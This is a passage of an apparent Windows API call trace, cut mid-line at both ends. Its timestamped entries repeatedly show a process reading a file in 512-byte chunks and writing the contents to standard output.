liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.450] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] GetFileType (hFile=0x50) returned 0x1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] GetFileType (hFile=0x50) returned 0x1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] GetFileType (hFile=0x50) returned 0x1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] GetFileType (hFile=0x50) returned 0x1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] GetFileType (hFile=0x50) returned 0x1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] GetFileType (hFile=0x50) returned 0x1 [0209.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.451] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.451] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.451] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.451] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] GetFileType (hFile=0x50) returned 0x1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] GetFileType (hFile=0x50) returned 0x1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] GetFileType (hFile=0x50) returned 0x1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] GetFileType (hFile=0x50) returned 0x1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] GetFileType (hFile=0x50) returned 0x1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] GetFileType (hFile=0x50) returned 0x1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.452] GetFileType (hFile=0x50) returned 0x1 [0209.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] GetFileType (hFile=0x50) returned 0x1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.453] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.453] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.453] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.453] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] GetFileType (hFile=0x50) returned 0x1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] GetFileType (hFile=0x50) returned 0x1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] GetFileType (hFile=0x50) returned 0x1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] GetFileType (hFile=0x50) returned 0x1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.453] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] GetFileType (hFile=0x50) returned 0x1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] GetFileType (hFile=0x50) returned 0x1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] GetFileType (hFile=0x50) returned 0x1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] GetFileType (hFile=0x50) returned 0x1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.454] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.454] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.454] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.454] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] GetFileType (hFile=0x50) returned 0x1 [0209.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.454] GetFileType (hFile=0x50) returned 0x1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] GetFileType (hFile=0x50) returned 0x1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] GetFileType (hFile=0x50) returned 0x1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] GetFileType (hFile=0x50) returned 0x1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] GetFileType (hFile=0x50) returned 0x1 [0209.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.455] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] GetFileType (hFile=0x50) returned 0x1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] GetFileType (hFile=0x50) returned 0x1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.456] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.456] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.456] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.456] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] GetFileType (hFile=0x50) returned 0x1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] GetFileType (hFile=0x50) returned 0x1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] GetFileType (hFile=0x50) returned 0x1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.456] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.456] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] GetFileType (hFile=0x50) returned 0x1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] GetFileType (hFile=0x50) returned 0x1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] GetFileType (hFile=0x50) returned 0x1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] GetFileType (hFile=0x50) returned 0x1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] GetFileType (hFile=0x50) returned 0x1 [0209.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.457] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.457] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.457] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.457] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.457] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] GetFileType (hFile=0x50) returned 0x1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] GetFileType (hFile=0x50) returned 0x1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] GetFileType (hFile=0x50) returned 0x1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] GetFileType (hFile=0x50) returned 0x1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] GetFileType (hFile=0x50) returned 0x1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] GetFileType (hFile=0x50) returned 0x1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.458] GetFileType (hFile=0x50) returned 0x1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] GetFileType (hFile=0x50) returned 0x1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.459] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.459] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.459] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.459] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] GetFileType (hFile=0x50) returned 0x1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] GetFileType (hFile=0x50) returned 0x1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] GetFileType (hFile=0x50) returned 0x1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] GetFileType (hFile=0x50) returned 0x1 [0209.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.459] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] GetFileType (hFile=0x50) returned 0x1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] GetFileType (hFile=0x50) returned 0x1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] GetFileType (hFile=0x50) returned 0x1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] GetFileType (hFile=0x50) returned 0x1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.460] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.460] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.460] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.460] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] GetFileType (hFile=0x50) returned 0x1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.460] GetFileType (hFile=0x50) returned 0x1 [0209.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, 